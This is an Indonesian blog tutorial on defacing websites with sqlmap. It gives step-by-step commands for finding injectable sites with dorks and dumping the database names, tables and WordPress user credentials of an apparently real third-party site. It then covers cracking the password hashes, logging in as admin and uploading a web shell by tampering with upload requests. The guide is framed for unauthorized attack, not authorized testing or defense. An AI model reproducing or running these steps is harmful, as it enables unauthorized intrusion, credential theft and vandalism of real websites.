oke kali ini saya akan share tutorial Deface dengan SQLMAP di windows,oke langsung aja
bahan-bahan:
bahan-bahan:
Phyton download disini
Shell jika belum punya download disini <<ada macam" versi ^_^
Tamper data,karena tidak semua web ada tempat upload file .php rata" file" jpg,png, dll jadi kita harus melakukan tamper data untuk upload shellnya , belum tau tutorial tamper data ,kesini
1. Bisa melakukan SQL Injection dengen beberapa method seperti:
- Boolean-Based Blind SQL Injection
- Time-Based Blind SQL Injection
- Error-Based SQL Injection
- UNION Query SQL Injection
- Stacked Query SQL Injection
2. Bisa berjalan baik untuk beberapa jenis database seperti:
- MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase &SAP MaxDB
Langsung aja kalo gak mau susah" cari satu persatu web vuln ,tinggal masukin dork ,scan ^_^ disni Disana :v , <<jika tidak work lagi ,anda harus mencari satu persatu target ,.
oke mari kita ke tutorial
1.cari target menggunakan dork scanner/manual , kalo belum tau yang manual , tambahkan tanda petik atas di ujung web/sebelum angka terakhir web
2.jika udah nemu yang vuln maka akan seperti ini
Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home/users1/v/victarius/domains/golosdoma2.com/opinions.php on line 25
3.buka command prompt ketik " cd C:\Users\BL4CK_3YE116\Desktop\sqlmap " tanpa tanda petik , directory C:\Users\BL4CK_3YE116\Desktop\sqlmap merupakan directory folder tempat sqlmap berada
4.setelah itu ketik sqlmap.py -u http://situstarget/opinions.php?(sqli) di sini saya menggunakan situs http://golosdoma2.com/opinions.php?id=22 , dan saya mengetik sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 untuk scan situs tersebut
5.lalu ketik sqlmap.py -u http://situstarget/opinions.php?(sqli) --dbs disini saya menggunakan sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 --dbs , untuk melihat database situs tersebut
6.Saya menemukan information_schema dan victarius <<itu berati nama databasenya ^_^
7.saya menggunakan database " victarius " lalu sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 -D victarius --tables untuk melihat tables dari database tersebut
8.Saya menemukan table wp_users yang menurut saya menarik ^_^
9.setelah itu ketik sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 -D victarius -T wp_users --column , untuk melhat column dari tables tersebut , lalu muncul
10.Saya pilih column ID,user_login,user_pass .dump column tersebut dengan cara sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 -D victarius -T wp_users -C ID,user_login,user_pass --dump , lalu muncul dah
11.Password tersebut adalah MD5 wordpress(tergantung web tersebut) , dan setahu saya ngak bisa di crack ! :( tapi dalam sqlmap ada tools untuk menebak jenis password tersebut dengan dictionary yang ada :) untuk melihat definisi dan jenis hash bisa di lihat Disini
nah kalo udah di crack passwordnya ,tinggal login deh ke site adminnya dengan mencari url halaman login adminnya disini << fitur terserbut mencari halaman admin login website yang telah di tentukan.
kalo udah ketemu login deh, ^_^ ,nah jika di dashboard admin tersebut tidak ada tempat untuk upload file .php hanya bisa upload file seperti gambar , maka menggunakan tutorial tamper data dsini
kalo udah ketemu login deh, ^_^ ,nah jika di dashboard admin tersebut tidak ada tempat untuk upload file .php hanya bisa upload file seperti gambar , maka menggunakan tutorial tamper data dsini
dah ya sekian ,semoga bermanfaat..
Copas? ,sertakan sumber xdigitalmedia.my.id
Copas? ,sertakan sumber xdigitalmedia.my.id
Silahkan berkomentar sesuai tema,gunakan kata-kata yang sopan dalam berkomentar . ConversionConversion EmoticonEmoticon Off Topic